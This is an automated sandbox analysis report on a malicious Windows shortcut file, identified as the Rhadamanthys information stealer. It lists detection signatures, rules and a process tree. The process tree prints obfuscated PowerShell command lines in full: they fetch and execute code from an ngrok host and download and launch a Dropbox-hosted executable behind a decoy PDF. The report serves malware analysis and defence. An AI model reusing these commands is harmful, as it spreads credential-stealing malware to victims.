Edit tour
Windows
Analysis Report
KjECqzXLWp.lnk
Overview
General Information
Sample name: | KjECqzXLWp.lnkrenamed because original name is a hash value |
Original sample name: | 10f48fb5d22c80c966c8b51516ecdb712130d96342fe56453ae38b613c57394c.lnk |
Analysis ID: | 1576187 |
MD5: | 788d10e14721316e78a70a1b0a8b2f88 |
SHA1: | 75d833f1133695d7c9e459894c05cf0a7baea5fa |
SHA256: | 10f48fb5d22c80c966c8b51516ecdb712130d96342fe56453ae38b613c57394c |
Tags: | Compilazioneprotetticopyrightlnkuser-JAMESWT_MHT |
Infos: | |
Detection
RHADAMANTHYS
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RHADAMANTHYS Stealer
AI detected suspicious sample
Creates multiple autostart registry keys
Drops PE files to the document folder of the user
Drops large PE files
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Powerup Write Hijack DLL
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Detected suspicious crossdomain redirect
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Classification
- System is w10x64
- cmd.exe (PID: 7496 cmdline:
"C:\Window s\System32 \cmd.exe" /c pOweRsH eLL -wIndo WStYLe hiD deN -c set -alias aa6 f17 curl ; sal ave06 1 iEx ; av e061(aa6f1 7 -Uri htt ps://sywjr hlmpverlye ufij3igz4h nnxuauu.ng rok.app/ap i/secure/e 4a88f04990 bcb4fecb3c d3c61ff6c7 e -UseBasi cParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7556 cmdline:
pOweRsHeLL -wIndoWSt YLe hiDdeN -c set-al ias aa6f17 curl ; sa l ave061 i Ex ; ave06 1(aa6f17 - Uri https: //sywjrhlm pverlyeufi j3igz4hnnx uauu.ngrok .app/api/s ecure/e4a8 8f04990bcb 4fecb3cd3c 61ff6c7e - UseBasicPa rsing) MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 7872 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk https://w ww.dropbox .com/scl/f i/sirgrh5w cotr94vrt7 u4y/Lewis- Silkin-LLP .pdf?rlkey =gy86lkfsw aic1rpangj d98k9m&dl= 1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8144 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 76 --field -trial-han dle=2012,i ,142653104 6279644958 5,17629014 0625885007 33,262144 /prefetch: 3 MD5: 69222B8101B0601CC6663F8381E7E00F) - cmd.exe (PID: 9100 cmdline:
C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\2803 39642.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 9108 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 9196 cmdline:
powershell -wIndoWSt YLe hiDdeN -NoProfil e -Command "$RandomP DF = Join- Path -Path $env:TEMP -ChildPat h ('{0}.pd f' -f ([gu id]::NewGu id())); $R andomEXE = Join-Path -Path $en v:TEMP -Ch ildPath (' {0}.exe' - f ([guid]: :NewGuid() )); Invoke -WebReques t -Uri 'ht tps://www. dropbox.co m/scl/fi/s irgrh5wcot r94vrt7u4y /Lewis-Sil kin-LLP.pd f?rlkey=gy 86lkfswaic 1rpangjd98 k9m&dl=1' -OutFile $ RandomPDF; Start-Pro cess -File Path 'msed ge.exe' -A rgumentLis t '--kiosk ', $Random PDF; Invok e-WebReque st -Uri 'h ttps://www .dropbox.c om/scl/fi/ 7h4lmqhsim 6jg8ftlpzw 9/runner.e xe?rlkey=t 1ai59v9g7a jzdg92ep3a qz67&dl=1' -OutFile $RandomEXE ; Start-Pr ocess -Fil ePath $Ran domEXE; if (Test-Pat h $RandomE XE) { Invo ke-WebRequ est -Uri ' https://sy wjrhlmpver lyeufij3ig z4hnnxuauu .ngrok.app /metadata/ e4a88f0499 0bcb4fecb3 cd3c61ff6c 7e'; }" MD5: 04029E121A0CFA5991749937DD22A1D9) - msedge.exe (PID: 8696 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk C:\Users\ user\AppDa ta\Local\T emp\eb3e36 5c-3b4e-4f 5f-8dad-50 533203423c .pdf MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 3916 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 56 --field -trial-han dle=2076,i ,149805599 9042565752 6,62093622 4691727961 9,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - 33937b54-1258-4cce-9d38-c5bceb144cd0.exe (PID: 9780 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\33937b 54-1258-4c ce-9d38-c5 bceb144cd0 .exe" MD5: B26B89DA53213C4EC12949A83806B611) - 33937b54-1258-4cce-9d38-c5bceb144cd0.exe (PID: 8116 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\33937b 54-1258-4c ce-9d38-c5 bceb144cd0 .exe" MD5: B26B89DA53213C4EC12949A83806B611) - fontdrvhost.exe (PID: 9664 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D) - fontdrvhost.exe (PID: 8256 cmdline:
"C:\Window s\System32 \fontdrvho st.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F) - WerFault.exe (PID: 8320 cmdline:
C:\Windows \system32\ WerFault.e xe -u -p 8 256 -s 144 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0) - WerFault.exe (PID: 9572 cmdline:
C:\Windows \SysWOW64\ WerFault.e xe -u -p 8 116 -s 320 MD5: C31336C1EFC2CCB44B4326EA793040F2)
- svchost.exe (PID: 8008 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- msedge.exe (PID: 8160 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --kiosk --flag-sw itches-beg in --flag- switches-e nd --disab le-nacl -- do-not-de- elevate ht tps://www. dropbox.co m/scl/fi/s irgrh5wcot r94vrt7u4y /Lewis-Sil kin-LLP.pd f?rlkey=gy 86lkfswaic 1rpangjd98 k9m&dl=1 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 4888 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 48 --field -trial-han dle=2120,i ,251581763 3994970963 ,122433225 2832510043 6,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8556 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ass et_store.m ojom.Asset StoreServi ce --lang= en-GB --se rvice-sand box-type=a sset_store _service - -mojo-plat form-chann el-handle= 6520 --fie ld-trial-h andle=2120 ,i,2515817 6339949709 63,1224332 2528325100 436,262144 /prefetch :8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8592 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=ent ity_extrac tion_servi ce.mojom.E xtractor - -lang=en-G B --servic e-sandbox- type=entit y_extracti on --onnx- enabled-fo r-ee --moj o-platform -channel-h andle=6704 --field-t rial-handl e=2120,i,2 5158176339 94970963,1 2243322528 325100436, 262144 /pr efetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - identity_helper.exe (PID: 9032 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.47\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 108 --fiel d-trial-ha ndle=2120, i,25158176 3399497096 3,12243322 5283251004 36,262144 /prefetch: 8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416) - identity_helper.exe (PID: 9052 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \117.0.204 5.47\ident ity_helper .exe" --ty pe=utility --utility -sub-type= winrt_app_ id.mojom.W inrtAppIdS ervice --l ang=en-GB --service- sandbox-ty pe=none -- mojo-platf orm-channe l-handle=7 108 --fiel d-trial-ha ndle=2120, i,25158176 3399497096 3,12243322 5283251004 36,262144 /prefetch: 8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416) - msedge.exe (PID: 7980 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_collecti ons.mojom. Collection sDataManag er --lang= en-GB --se rvice-sand box-type=c ollections --mojo-pl atform-cha nnel-handl e=7920 --f ield-trial -handle=21 20,i,25158 1763399497 0963,12243 3225283251 00436,2621 44 /prefet ch:8 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 2060 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= ppapi --la ng=en-GB - -device-sc ale-factor =1 --ppapi -antialias ed-text-en abled=1 -- ppapi-subp ixel-rende ring-setti ng=1 --moj o-platform -channel-h andle=7236 --field-t rial-handl e=2120,i,2 5158176339 94970963,1 2243322528 325100436, 262144 /pr efetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 8420 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=edg e_search_i ndexer.moj om.SearchI ndexerInte rfaceBroke r --lang=e n-GB --ser vice-sandb ox-type=se arch_index er --messa ge-loop-ty pe-ui --mo jo-platfor m-channel- handle=785 6 --field- trial-hand le=2120,i, 2515817633 994970963, 1224332252 8325100436 ,262144 /p refetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
- msedge.exe (PID: 9252 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --no-st artup-wind ow --win-s ession-sta rt /prefet ch:5 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 9512 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=20 96 --field -trial-han dle=2064,i ,518098800 9760175564 ,137378994 9224271994 0,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
- msedge.exe (PID: 9796 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --no-st artup-wind ow --win-s ession-sta rt /prefet ch:5 MD5: 69222B8101B0601CC6663F8381E7E00F) - msedge.exe (PID: 10016 cmdline:
"C:\Progra m Files (x 86)\Micros oft\Edge\A pplication \msedge.ex e" --type= utility -- utility-su b-type=net work.mojom .NetworkSe rvice --la ng=en-GB - -service-s andbox-typ e=none --m ojo-platfo rm-channel -handle=21 52 --field -trial-han dle=2032,i ,145012807 7693976550 3,83598209 6983901991 4,262144 / prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. |
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security | ||
Click to see the 5 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
System Summary |
---|
Source: | Author: Subhash Popuri (@pbssubhash): |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |